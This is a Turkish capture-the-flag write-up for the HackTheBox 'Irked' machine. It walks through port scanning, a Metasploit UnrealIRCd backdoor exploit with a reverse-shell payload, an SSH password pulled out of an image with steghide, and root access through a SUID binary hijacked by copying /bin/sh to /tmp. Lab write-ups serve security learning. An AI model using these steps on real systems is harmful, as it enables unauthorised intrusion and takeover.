Merhabalar bu yazımızda Hackthebox Irked Çözümü sizler için ele alacağım.
- Makine İsmi: Irked
- Makine Zorluğu: Kolay-Orta seviye zorlukta
- Makine Oda Linki: Hackthebox
1- Nmap taraması ile portları tespit ediyorum. 3 port açık ve teker teker portları incelemeye başlıyorum.
22,80,111. portlarda herhangi bir açık bulamadım, Apache 2.4.10 üzerinde de ciddi bir açık yok.
Nikto ile taramaya geçiyorum.
2- Nikto ile taradım ve işe yarar bir şey bulamadım. Direkt http olarak sayfayı ziyaret edeceğim ve açık için araştırma yapmaya devam ediyorum.
3- Sayfayı ziyaret ettim ve kaynak kodlarını incelediğimde bir şey bulamadım.
Siteyi ziyaret ettiğimizde karşımıza IRC sisteminin aktif olarak çalıştığını belirtiyor Metasploit üzerinden açık olup olmadığını araştırma aşamasına geçiyorum.
İlginizi çekebilecek yazımız: Brick Builder Theme Eklentisinde Güvenlik Açığı Çıktı!
4- Metasploit üzerinden baktığımda açığı sömürebileceğimiz kesin olan 1 exploit bulmuş olduk.
- use exploit/unix/irc/unreal_ircd_3281_backdoor yaparak exploiti seçiyoruz.
5- Exploit düzenlemelerini yapmaya başlıyoruz.
- set payload paylaod/cmd/unix/reverse
- set rhost 10.10.10.117
- set rport 8067
- set lhost vpn ip adresiniz
- set lport 4444
- run
yazarak exploiti ayarladık ve çalıştırıyoruz. 2-3 dk içerisinde otomatik olarak terminal açılacaktır.
6- Shell yazdık ve boşluğa aşağıdaki bash kabuğuna geçiş için yapmanızı öneriyorum.
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ yaparak bash kabuğuna geçebiliriz.
7- Home dizinin içerisine gezdim ve pek bir şey bulamadım. djmardov içerisinde yetkimiz olmadığı için user.txt okuyamadık.
İçerisinde gezerken Documents klasörü içerisinde steg backup password keşfettim anladığımız http ana sayfa içerisindeki resimi indirip brute force ile SSH şifresine ulaşabiliriz. Resim içerisinde SSH şifremiz gizli.
8- Sırasıyla;
- wget http://10.10.10.117/irked.jpg
- steghide extract -p UPupDOWNdownLRlrBAbaSSss -sf irked.jpg dedik ve şifremizi bulduk.
9- ssh [email protected] yazarak ssh içerisine girdik.
Linpeas ile araştırdım ve bir şey bulamadım direkt manuel deneme yapmaya karar verdim.
Dikkatimi çeken /usr/bin/viewuser/ üzerinden root olabileceğimizi düşünüyorum.
10- Araştırdım ve root üzerine tanımlı olduğunu görüyoruz. Sırasıyla;
- cp /bin/sh /tmp/listusers
- /usr/bin/viewuser yazdık ve direkt root olduk.
cat root/root.txt yazarak root bayrağını bulduk.
cat /home/djmardov/user.txt ile user bayrağını bulmuş olduk.
Hackthebox Irked Çözümü yazımızın sonuna geldik, yeni yazılarda görüşmek üzere..
Sağlıcakla kalın…